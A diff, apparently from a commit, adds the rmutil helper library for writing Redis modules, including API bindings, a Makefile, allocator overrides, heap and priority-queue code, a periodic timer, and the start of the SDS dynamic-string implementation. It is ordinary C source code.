+    REDISMODULE_GET_API(Alloc);
+    REDISMODULE_GET_API(Calloc);
+    REDISMODULE_GET_API(Free);
+    REDISMODULE_GET_API(Realloc);
+    REDISMODULE_GET_API(Strdup);
+    REDISMODULE_GET_API(CreateCommand);
+    REDISMODULE_GET_API(SetModuleAttribs);
+    REDISMODULE_GET_API(IsModuleNameBusy);
+    REDISMODULE_GET_API(WrongArity);
+    REDISMODULE_GET_API(ReplyWithLongLong);
+    REDISMODULE_GET_API(ReplyWithError);
+    REDISMODULE_GET_API(ReplyWithSimpleString);
+    REDISMODULE_GET_API(ReplyWithArray);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(ReplyWithStringBuffer);
+    REDISMODULE_GET_API(ReplyWithString);
+    REDISMODULE_GET_API(ReplyWithNull);
+    REDISMODULE_GET_API(ReplyWithCallReply);
+    REDISMODULE_GET_API(ReplyWithDouble);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(GetSelectedDb);
+    REDISMODULE_GET_API(SelectDb);
+    REDISMODULE_GET_API(OpenKey);
+    REDISMODULE_GET_API(CloseKey);
+    REDISMODULE_GET_API(KeyType);
+    REDISMODULE_GET_API(ValueLength);
+    REDISMODULE_GET_API(ListPush);
+    REDISMODULE_GET_API(ListPop);
+    REDISMODULE_GET_API(StringToLongLong);
+    REDISMODULE_GET_API(StringToDouble);
+    REDISMODULE_GET_API(Call);
+    REDISMODULE_GET_API(CallReplyProto);
+    REDISMODULE_GET_API(FreeCallReply);
+    REDISMODULE_GET_API(CallReplyInteger);
+    REDISMODULE_GET_API(CallReplyType);
+    REDISMODULE_GET_API(CallReplyLength);
+    REDISMODULE_GET_API(CallReplyArrayElement);
+    REDISMODULE_GET_API(CallReplyStringPtr);
+    REDISMODULE_GET_API(CreateStringFromCallReply);
+    REDISMODULE_GET_API(CreateString);
+    REDISMODULE_GET_API(CreateStringFromLongLong);
+    REDISMODULE_GET_API(CreateStringFromString);
+    REDISMODULE_GET_API(CreateStringPrintf);
+    REDISMODULE_GET_API(FreeString);
+    REDISMODULE_GET_API(StringPtrLen);
+    REDISMODULE_GET_API(AutoMemory);
+    REDISMODULE_GET_API(Replicate);
+    REDISMODULE_GET_API(ReplicateVerbatim);
+    REDISMODULE_GET_API(DeleteKey);
+    REDISMODULE_GET_API(UnlinkKey);
+    REDISMODULE_GET_API(StringSet);
+    REDISMODULE_GET_API(StringDMA);
+    REDISMODULE_GET_API(StringTruncate);
+    REDISMODULE_GET_API(GetExpire);
+    REDISMODULE_GET_API(SetExpire);
+    REDISMODULE_GET_API(ZsetAdd);
+    REDISMODULE_GET_API(ZsetIncrby);
+    REDISMODULE_GET_API(ZsetScore);
+    REDISMODULE_GET_API(ZsetRem);
+    REDISMODULE_GET_API(ZsetRangeStop);
+    REDISMODULE_GET_API(ZsetFirstInScoreRange);
+    REDISMODULE_GET_API(ZsetLastInScoreRange);
+    REDISMODULE_GET_API(ZsetFirstInLexRange);
+    REDISMODULE_GET_API(ZsetLastInLexRange);
+    REDISMODULE_GET_API(ZsetRangeCurrentElement);
+    REDISMODULE_GET_API(ZsetRangeNext);
+    REDISMODULE_GET_API(ZsetRangePrev);
+    REDISMODULE_GET_API(ZsetRangeEndReached);
+    REDISMODULE_GET_API(HashSet);
+    REDISMODULE_GET_API(HashGet);
+    REDISMODULE_GET_API(IsKeysPositionRequest);
+    REDISMODULE_GET_API(KeyAtPos);
+    REDISMODULE_GET_API(GetClientId);
+    REDISMODULE_GET_API(GetContextFlags);
+    REDISMODULE_GET_API(PoolAlloc);
+    REDISMODULE_GET_API(CreateDataType);
+    REDISMODULE_GET_API(ModuleTypeSetValue);
+    REDISMODULE_GET_API(ModuleTypeGetType);
+    REDISMODULE_GET_API(ModuleTypeGetValue);
+    REDISMODULE_GET_API(SaveUnsigned);
+    REDISMODULE_GET_API(LoadUnsigned);
+    REDISMODULE_GET_API(SaveSigned);
+    REDISMODULE_GET_API(LoadSigned);
+    REDISMODULE_GET_API(SaveString);
+    REDISMODULE_GET_API(SaveStringBuffer);
+    REDISMODULE_GET_API(LoadString);
+    REDISMODULE_GET_API(LoadStringBuffer);
+    REDISMODULE_GET_API(SaveDouble);
+    REDISMODULE_GET_API(LoadDouble);
+    REDISMODULE_GET_API(SaveFloat);
+    REDISMODULE_GET_API(LoadFloat);
+    REDISMODULE_GET_API(EmitAOF);
+    REDISMODULE_GET_API(Log);
+    REDISMODULE_GET_API(LogIOError);
+    REDISMODULE_GET_API(StringAppendBuffer);
+    REDISMODULE_GET_API(RetainString);
+    REDISMODULE_GET_API(StringCompare);
+    REDISMODULE_GET_API(GetContextFromIO);
+    REDISMODULE_GET_API(Milliseconds);
+    REDISMODULE_GET_API(DigestAddStringBuffer);
+    REDISMODULE_GET_API(DigestAddLongLong);
+    REDISMODULE_GET_API(DigestEndSequence);
+    REDISMODULE_GET_API(CreateDict);
+    REDISMODULE_GET_API(FreeDict);
+    REDISMODULE_GET_API(DictSize);
+    REDISMODULE_GET_API(DictSetC);
+    REDISMODULE_GET_API(DictReplaceC);
+    REDISMODULE_GET_API(DictSet);
+    REDISMODULE_GET_API(DictReplace);
+    REDISMODULE_GET_API(DictGetC);
+    REDISMODULE_GET_API(DictGet);
+    REDISMODULE_GET_API(DictDelC);
+    REDISMODULE_GET_API(DictDel);
+    REDISMODULE_GET_API(DictIteratorStartC);
+    REDISMODULE_GET_API(DictIteratorStart);
+    REDISMODULE_GET_API(DictIteratorStop);
+    REDISMODULE_GET_API(DictIteratorReseekC);
+    REDISMODULE_GET_API(DictIteratorReseek);
+    REDISMODULE_GET_API(DictNextC);
+    REDISMODULE_GET_API(DictPrevC);
+    REDISMODULE_GET_API(DictNext);
+    REDISMODULE_GET_API(DictPrev);
+    REDISMODULE_GET_API(DictCompare);
+    REDISMODULE_GET_API(DictCompareC);
+
+#ifdef REDISMODULE_EXPERIMENTAL_API
+    REDISMODULE_GET_API(GetThreadSafeContext);
+    REDISMODULE_GET_API(FreeThreadSafeContext);
+    REDISMODULE_GET_API(ThreadSafeContextLock);
+    REDISMODULE_GET_API(ThreadSafeContextUnlock);
+    REDISMODULE_GET_API(BlockClient);
+    REDISMODULE_GET_API(UnblockClient);
+    REDISMODULE_GET_API(IsBlockedReplyRequest);
+    REDISMODULE_GET_API(IsBlockedTimeoutRequest);
+    REDISMODULE_GET_API(GetBlockedClientPrivateData);
+    REDISMODULE_GET_API(GetBlockedClientHandle);
+    REDISMODULE_GET_API(AbortBlock);
+    REDISMODULE_GET_API(SetDisconnectCallback);
+    REDISMODULE_GET_API(SubscribeToKeyspaceEvents);
+    REDISMODULE_GET_API(BlockedClientDisconnected);
+    REDISMODULE_GET_API(RegisterClusterMessageReceiver);
+    REDISMODULE_GET_API(SendClusterMessage);
+    REDISMODULE_GET_API(GetClusterNodeInfo);
+    REDISMODULE_GET_API(GetClusterNodesList);
+    REDISMODULE_GET_API(FreeClusterNodesList);
+    REDISMODULE_GET_API(CreateTimer);
+    REDISMODULE_GET_API(StopTimer);
+    REDISMODULE_GET_API(GetTimerInfo);
+    REDISMODULE_GET_API(GetMyClusterID);
+    REDISMODULE_GET_API(GetClusterSize);
+    REDISMODULE_GET_API(GetRandomBytes);
+    REDISMODULE_GET_API(GetRandomHexChars);
+    REDISMODULE_GET_API(SetClusterFlags);
+#endif
+
+    if (RedisModule_IsModuleNameBusy && RedisModule_IsModuleNameBusy(name)) return REDISMODULE_ERR;
+    RedisModule_SetModuleAttribs(ctx,name,ver,apiver);
+    return REDISMODULE_OK;
+}
+
+#else
+
+/* Things only defined for the modules core, not exported to modules
+ * including this file. */
+#define RedisModuleString robj
+
+#endif /* REDISMODULE_CORE */
+#endif /* REDISMOUDLE_H */
@@ -0,0 +1,31 @@
+# set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+CFLAGS ?= -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function
+CFLAGS += -I$(RM_INCLUDE_DIR)
+CC=gcc
+
+OBJS=util.o strings.o sds.o vector.o alloc.o periodic.o
+
+all: librmutil.a
+
+clean:
+	rm -rf *.o *.a
+
+librmutil.a: $(OBJS)
+	ar rcs $@ $^
+
+test_vector: test_vector.o vector.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_vector
+
+test_periodic: test_periodic.o periodic.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_periodic
+	
+test: test_periodic test_vector
+.PHONY: test
@@ -0,0 +1,32 @@
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "alloc.h"
+
+/* A patched implementation of strdup that will use our patched calloc */
+char *rmalloc_strndup(const char *s, size_t n) {
+  char *ret = calloc(n + 1, sizeof(char));
+  if (ret)
+    memcpy(ret, s, n);
+  return ret;
+}
+
+/*
+ * Re-patching RedisModule_Alloc and friends to the original malloc functions
+ *
+ * This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main().
+ *
+ * Since including "alloc.h" while defining REDIS_MODULE_TARGET
+ * replaces all malloc functions in redis with the RM_Alloc family of functions,
+ * when running that code outside of redis, your app will crash. This function
+ * patches the RM_Alloc functions back to the original mallocs. */
+void RMUTil_InitAlloc() {
+
+  RedisModule_Alloc = malloc;
+  RedisModule_Realloc = realloc;
+  RedisModule_Calloc = calloc;
+  RedisModule_Free = free;
+  RedisModule_Strdup = strdup;
+}
@@ -0,0 +1,51 @@
+#ifndef __RMUTIL_ALLOC__
+#define __RMUTIL_ALLOC__
+
+/* Automatic Redis Module Allocation functions monkey-patching.
+ *
+ * Including this file while REDIS_MODULE_TARGET is defined, will explicitly
+ * override malloc, calloc, realloc & free with RedisModule_Alloc,
+ * RedisModule_Callc, etc implementations, that allow Redis better control and
+ * reporting over allocations per module.
+ *
+ * You should include this file in all c files AS THE LAST INCLUDED FILE
+ *
+ * This only has effect when when compiling with the macro REDIS_MODULE_TARGET
+ * defined. The idea is that for unit tests it will not be defined, but for the
+ * module build target it will be.
+ *
+ */
+
+#include <stdlib.h>
+#include <redismodule.h>
+
+char *rmalloc_strndup(const char *s, size_t n);
+
+#ifdef REDIS_MODULE_TARGET /* Set this when compiling your code as a module */
+
+#define malloc(size) RedisModule_Alloc(size)
+#define calloc(count, size) RedisModule_Calloc(count, size)
+#define realloc(ptr, size) RedisModule_Realloc(ptr, size)
+#define free(ptr) RedisModule_Free(ptr)
+
+#ifdef strdup
+#undef strdup
+#endif
+#define strdup(ptr) RedisModule_Strdup(ptr)
+
+/* More overriding */
+// needed to avoid calling strndup->malloc
+#ifdef strndup
+#undef strndup
+#endif
+#define strndup(s, n) rmalloc_strndup(s, n)
+
+#else
+
+#endif /* REDIS_MODULE_TARGET */
+/* This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main() */
+void RMUTil_InitAlloc();
+
+#endif /* __RMUTIL_ALLOC__ */
@@ -0,0 +1,107 @@
+#include "heap.h"
+
+/* Byte-wise swap two items of size SIZE. */
+#define SWAP(a, b, size)                      \
+  do                                          \
+    {                                         \
+      register size_t __size = (size);        \
+      register char *__a = (a), *__b = (b);   \
+      do                                      \
+        {                                     \
+          char __tmp = *__a;                  \
+          *__a++ = *__b;                      \
+          *__b++ = __tmp;                     \
+        } while (--__size > 0);               \
+    } while (0)
+
+inline char *__vector_GetPtr(Vector *v, size_t pos) {
+    return v->data + (pos * v->elemSize);
+}
+
+void __sift_up(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    size_t len = last - first;
+    if (len > 1) {
+        len = (len - 2) / 2;
+        size_t ptr = first + len;
+        if (cmp(__vector_GetPtr(v, ptr), __vector_GetPtr(v, --last)) < 0) {
+            char t[v->elemSize];
+            memcpy(t, __vector_GetPtr(v, last), v->elemSize);
+            do {
+                memcpy(__vector_GetPtr(v, last), __vector_GetPtr(v, ptr), v->elemSize);
+                last = ptr;
+                if (len == 0)
+                    break;
+                len = (len - 1) / 2;
+                ptr = first + len;
+            } while (cmp(__vector_GetPtr(v, ptr), t) < 0);
+            memcpy(__vector_GetPtr(v, last), t, v->elemSize);
+        }
+    }
+}
+
+void __sift_down(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *), size_t start) {
+    // left-child of __start is at 2 * __start + 1
+    // right-child of __start is at 2 * __start + 2
+    size_t len = last - first;
+    size_t child = start - first;
+
+    if (len < 2 || (len - 2) / 2 < child)
+        return;
+
+    child = 2 * child + 1;
+
+    if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+        // right-child exists and is greater than left-child
+        ++child;
+    }
+
+    // check if we are in heap-order
+    if (cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, start)) < 0)
+        // we are, __start is larger than it's largest child
+        return;
+
+    char top[v->elemSize];
+    memcpy(top, __vector_GetPtr(v, start), v->elemSize);
+    do {
+        // we are not in heap-order, swap the parent with it's largest child
+        memcpy(__vector_GetPtr(v, start), __vector_GetPtr(v, first + child), v->elemSize);
+        start = first + child;
+
+        if ((len - 2) / 2 < child)
+            break;
+
+        // recompute the child based off of the updated parent
+        child = 2 * child + 1;
+
+        if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+            // right-child exists and is greater than left-child
+            ++child;
+        }
+
+        // check if we are in heap-order
+    } while (cmp(__vector_GetPtr(v, first + child), top) >= 0);
+    memcpy(__vector_GetPtr(v, start), top, v->elemSize);
+}
+
+
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        // start from the first parent, there is no need to consider children
+        for (int start = (last - first - 2) / 2; start >= 0; --start) {
+            __sift_down(v, first, last, cmp, first + start);
+        }
+    }
+}
+
+
+inline void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    __sift_up(v, first, last, cmp);
+}
+
+
+inline void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        SWAP(__vector_GetPtr(v, first), __vector_GetPtr(v, --last), v->elemSize);
+        __sift_down(v, first, last, cmp, first);
+    }
+}
@@ -0,0 +1,38 @@
+#ifndef __HEAP_H__
+#define __HEAP_H__
+
+#include "vector.h"
+
+
+/* Make heap from range
+ * Rearranges the elements in the range [first,last) in such a way that they form a heap.
+ * A heap is a way to organize the elements of a range that allows for fast retrieval of the element with the highest
+ * value at any moment (with pop_heap), even repeatedly, while allowing for fast insertion of new elements (with
+ * push_heap).
+ * The element with the highest value is always pointed by first. The order of the other elements depends on the
+ * particular implementation, but it is consistent throughout all heap-related functions of this header.
+ * The elements are compared using cmp.
+ */
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Push element into heap range
+ * Given a heap in the range [first,last-1), this function extends the range considered a heap to [first,last) by
+ * placing the value in (last-1) into its corresponding location within it.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Pop element from heap range
+ * Rearranges the elements in the heap range [first,last) in such a way that the part considered a heap is shortened
+ * by one: The element with the highest value is moved to (last-1).
+ * While the element with the highest value is moved from first to (last-1) (which now is out of the heap), the other
+ * elements are reorganized in such a way that the range [first,last-1) preserves the properties of a heap.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+#endif //__HEAP_H__
@@ -0,0 +1,11 @@
+#ifndef __RMUTIL_LOGGING_H__
+#define __RMUTIL_LOGGING_H__
+
+/* Convenience macros for redis logging */
+
+#define RM_LOG_DEBUG(ctx, ...) RedisModule_Log(ctx, "debug", __VA_ARGS__)
+#define RM_LOG_VERBOSE(ctx, ...) RedisModule_Log(ctx, "verbose", __VA_ARGS__)
+#define RM_LOG_NOTICE(ctx, ...) RedisModule_Log(ctx, "notice", __VA_ARGS__)
+#define RM_LOG_WARNING(ctx, ...) RedisModule_Log(ctx, "warning", __VA_ARGS__)
+
+#endif
@@ -0,0 +1,88 @@
+#define REDISMODULE_EXPERIMENTAL_API
+#include "periodic.h"
+#include <pthread.h>
+#include <stdlib.h>
+#include <errno.h>
+
+typedef struct RMUtilTimer {
+  RMutilTimerFunc cb;
+  RMUtilTimerTerminationFunc onTerm;
+  void *privdata;
+  struct timespec interval;
+  pthread_t thread;
+  pthread_mutex_t lock;
+  pthread_cond_t cond;
+} RMUtilTimer;
+
+static struct timespec timespecAdd(struct timespec *a, struct timespec *b) {
+  struct timespec ret;
+  ret.tv_sec = a->tv_sec + b->tv_sec;
+
+  long long ns = a->tv_nsec + b->tv_nsec;
+  ret.tv_sec += ns / 1000000000;
+  ret.tv_nsec = ns % 1000000000;
+  return ret;
+}
+
+static void *rmutilTimer_Loop(void *ctx) {
+  RMUtilTimer *tm = ctx;
+
+  int rc = ETIMEDOUT;
+  struct timespec ts;
+
+  pthread_mutex_lock(&tm->lock);
+  while (rc != 0) {
+    clock_gettime(CLOCK_REALTIME, &ts);
+    struct timespec timeout = timespecAdd(&ts, &tm->interval);
+    if ((rc = pthread_cond_timedwait(&tm->cond, &tm->lock, &timeout)) == ETIMEDOUT) {
+
+      // Create a thread safe context if we're running inside redis
+      RedisModuleCtx *rctx = NULL;
+      if (RedisModule_GetThreadSafeContext) rctx = RedisModule_GetThreadSafeContext(NULL);
+
+      // call our callback...
+      tm->cb(rctx, tm->privdata);
+
+      // If needed - free the thread safe context.
+      // It's up to the user to decide whether automemory is active there
+      if (rctx) RedisModule_FreeThreadSafeContext(rctx);
+    }
+    if (rc == EINVAL) {
+      perror("Error waiting for condition");
+      break;
+    }
+  }
+
+  // call the termination callback if needed
+  if (tm->onTerm != NULL) {
+    tm->onTerm(tm->privdata);
+  }
+
+  // free resources associated with the timer
+  pthread_cond_destroy(&tm->cond);
+  free(tm);
+
+  return NULL;
+}
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval) {
+  t->interval = newInterval;
+}
+
+RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
+                                     void *privdata, struct timespec interval) {
+  RMUtilTimer *ret = malloc(sizeof(*ret));
+  *ret = (RMUtilTimer){
+      .privdata = privdata, .interval = interval, .cb = cb, .onTerm = onTerm,
+  };
+  pthread_cond_init(&ret->cond, NULL);
+  pthread_mutex_init(&ret->lock, NULL);
+
+  pthread_create(&ret->thread, NULL, rmutilTimer_Loop, ret);
+  return ret;
+}
+
+int RMUtilTimer_Terminate(struct RMUtilTimer *t) {
+  return pthread_cond_signal(&t->cond);
+}
@@ -0,0 +1,46 @@
+#ifndef RMUTIL_PERIODIC_H_
+#define RMUTIL_PERIODIC_H_
+#include <time.h>
+#include <redismodule.h>
+
+/** periodic.h - Utility periodic timer running a task repeatedly every given time interval */
+
+/* RMUtilTimer - opaque context for the timer */
+struct RMUtilTimer;
+
+/* RMutilTimerFunc - callback type for timer tasks. The ctx is a thread-safe redis module context
+ * that should be locked/unlocked by the callback when running stuff against redis. privdata is
+ * pre-existing private data */
+typedef void (*RMutilTimerFunc)(RedisModuleCtx *ctx, void *privdata);
+
+typedef void (*RMUtilTimerTerminationFunc)(void *privdata);
+
+/* Create and start a new periodic timer. Each timer has its own thread and can only be run and
+ * stopped once. The timer runs `cb` every `interval` with `privdata` passed to the callback. */
+struct RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
+                                            void *privdata, struct timespec interval);
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval);
+
+/* Stop the timer loop, call the termination callbck to free up any resources linked to the timer,
+ * and free the timer after stopping.
+ *
+ * This function doesn't wait for the thread to terminate, as it may cause a race condition if the
+ * timer's callback is waiting for the redis global lock.
+ * Instead you should make sure any resources are freed by the callback after the thread loop is
+ * finished.
+ *
+ * The timer is freed automatically, so the callback doesn't need to do anything about it.
+ * The callback gets the timer's associated privdata as its argument.
+ *
+ * If no callback is specified we do not free up privdata. If privdata is NULL we still call the
+ * callback, as it may log stuff or free global resources.
+ */
+int RMUtilTimer_Terminate(struct RMUtilTimer *t);
+
+/* DEPRECATED - do not use this function (well now you can't), use terminate instead
+    Free the timer context. The caller should be responsible for freeing the private data at this
+ * point */
+// void RMUtilTimer_Free(struct RMUtilTimer *t);
+#endif
@@ -0,0 +1,36 @@
+#include "priority_queue.h"
+#include "heap.h"
+
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *)) {
+    PriorityQueue *pq = malloc(sizeof(PriorityQueue));
+    pq->v = __newVectorSize(elemSize, cap);
+    pq->cmp = cmp;
+    return pq;
+}
+
+inline size_t Priority_Queue_Size(PriorityQueue *pq) {
+    return Vector_Size(pq->v);
+}
+
+inline int Priority_Queue_Top(PriorityQueue *pq, void *ptr) {
+    return Vector_Get(pq->v, 0, ptr);
+}
+
+inline size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem) {
+    size_t top = __vector_PushPtr(pq->v, elem);
+    Heap_Push(pq->v, 0, top, pq->cmp);
+    return top;
+}
+
+inline void Priority_Queue_Pop(PriorityQueue *pq) {
+    if (pq->v->top == 0) {
+        return;
+    }
+    Heap_Pop(pq->v, 0, pq->v->top, pq->cmp);
+    pq->v->top--;
+}
+
+void Priority_Queue_Free(PriorityQueue *pq) {
+    Vector_Free(pq->v);
+    free(pq);
+}
@@ -0,0 +1,55 @@
+#ifndef __PRIORITY_QUEUE_H__
+#define __PRIORITY_QUEUE_H__
+
+#include "vector.h"
+
+/* Priority queue
+ * Priority queues are designed such that its first element is always the greatest of the elements it contains.
+ * This context is similar to a heap, where elements can be inserted at any moment, and only the max heap element can be
+ * retrieved (the one at the top in the priority queue).
+ * Priority queues are implemented as Vectors. Elements are popped from the "back" of Vector, which is known as the top
+ * of the priority queue.
+ */
+typedef struct {
+    Vector *v;
+
+    int (*cmp)(void *, void *);
+} PriorityQueue;
+
+/* Construct priority queue
+ * Constructs a priority_queue container adaptor object.
+ */
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *));
+
+#define NewPriorityQueue(type, cap, cmp) __newPriorityQueueSize(sizeof(type), cap, cmp)
+
+/* Return size
+ * Returns the number of elements in the priority_queue.
+ */
+size_t Priority_Queue_Size(PriorityQueue *pq);
+
+/* Access top element
+ * Copy the top element in the priority_queue to ptr.
+ * The top element is the element that compares higher in the priority_queue.
+ */
+int Priority_Queue_Top(PriorityQueue *pq, void *ptr);
+
+/* Insert element
+ * Inserts a new element in the priority_queue.
+ */
+size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem);
+
+#define Priority_Queue_Push(pq, elem) __priority_Queue_PushPtr(pq, &(typeof(elem)){elem})
+
+/* Remove top element
+ * Removes the element on top of the priority_queue, effectively reducing its size by one. The element removed is the
+ * one with the highest value.
+ * The value of this element can be retrieved before being popped by calling Priority_Queue_Top.
+ */
+void Priority_Queue_Pop(PriorityQueue *pq);
+
+/* free the priority queue and the underlying data. Does not release its elements if
+ * they are pointers */
+void Priority_Queue_Free(PriorityQueue *pq);
+
+#endif //__PRIORITY_QUEUE_H__
@@ -0,0 +1,1274 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <assert.h>
+#include "sds.h"
+#include "sdsalloc.h"
+
+static inline int sdsHdrSize(char type) {
+    switch(type&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return sizeof(struct sdshdr5);
+        case SDS_TYPE_8:
+            return sizeof(struct sdshdr8);
+        case SDS_TYPE_16:
+            return sizeof(struct sdshdr16);
+        case SDS_TYPE_32:
+            return sizeof(struct sdshdr32);
+        case SDS_TYPE_64:
+            return sizeof(struct sdshdr64);
+    }
+    return 0;
+}
+
+static inline char sdsReqType(size_t string_size) {
+    if (string_size < 32)
+        return SDS_TYPE_5;
+    if (string_size < 0xff)
+        return SDS_TYPE_8;
+    if (string_size < 0xffff)
+        return SDS_TYPE_16;
+    if (string_size < 0xffffffff)
+        return SDS_TYPE_32;
+    return SDS_TYPE_64;
+}
+
+/* Create a new sds string with the content specified by the 'init' pointer
+ * and 'initlen'.
+ * If NULL is used for 'init' the string is initialized with zero bytes.
+ *
+ * The string is always null-termined (all the sds strings are, always) so
+ * even if you create an sds string with:
+ *
+ * mystring = sdsnewlen("abc",3);
+ *
+ * You can print the string with printf() as there is an implicit \0 at the
+ * end of the string. However the string is binary safe and can contain
+ * \0 characters in the middle, as the length is stored in the sds header. */
+sds sdsnewlen(const void *init, size_t initlen) {
+    void *sh;
+    sds s;
+    char type = sdsReqType(initlen);
+    /* Empty strings are usually created in order to append. Use type 8
+     * since type 5 is not good at this. */
+    if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
+    int hdrlen = sdsHdrSize(type);
+    unsigned char *fp; /* flags pointer. */
+
+    sh = s_malloc(hdrlen+initlen+1);
+    if (!init)
+        memset(sh, 0, hdrlen+initlen+1);
+    if (sh == NULL) return NULL;
+    s = (char*)sh+hdrlen;
+    fp = ((unsigned char*)s)-1;
+    switch(type) {
+        case SDS_TYPE_5: {
+            *fp = type | (initlen << SDS_TYPE_BITS);
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+    }
+    if (initlen && init)
+        memcpy(s, init, initlen);
+    s[initlen] = '\0';
+    return s;
+}
+
+/* Create an empty (zero length) sds string. Even in this case the string
+ * always has an implicit null term. */
+sds sdsempty(void) {
+    return sdsnewlen("",0);
+}
+
+/* Create a new sds string starting from a null terminated C string. */
+sds sdsnew(const char *init) {
+    size_t initlen = (init == NULL) ? 0 : strlen(init);
+    return sdsnewlen(init, initlen);
+}
+
+/* Duplicate an sds string. */
+sds sdsdup(const sds s) {
+    return sdsnewlen(s, sdslen(s));
+}
+
+/* Free an sds string. No operation is performed if 's' is NULL. */
+void sdsfree(sds s) {
+    if (s == NULL) return;
+    s_free((char*)s-sdsHdrSize(s[-1]));
+}
+
+/* Set the sds string length to the length as obtained with strlen(), so
+ * considering as content only up to the first null term character.
+ *
+ * This function is useful when the sds string is hacked manually in some
+ * way, like in the following example:
+ *
+ * s = sdsnew("foobar");
+ * s[2] = '\0';
+ * sdsupdatelen(s);
+ * printf("%d\n", sdslen(s));
+ *
+ * The output will be "2", but if we comment out the call to sdsupdatelen()
+ * the output will be "6" as the string was modified but the logical length
+ * remains 6 bytes. */
+void sdsupdatelen(sds s) {
+    int reallen = strlen(s);
+    sdssetlen(s, reallen);
+}
+
+/* Modify an sds string in-place to make it empty (zero length).
+ * However all the existing buffer is not discarded but set as free space
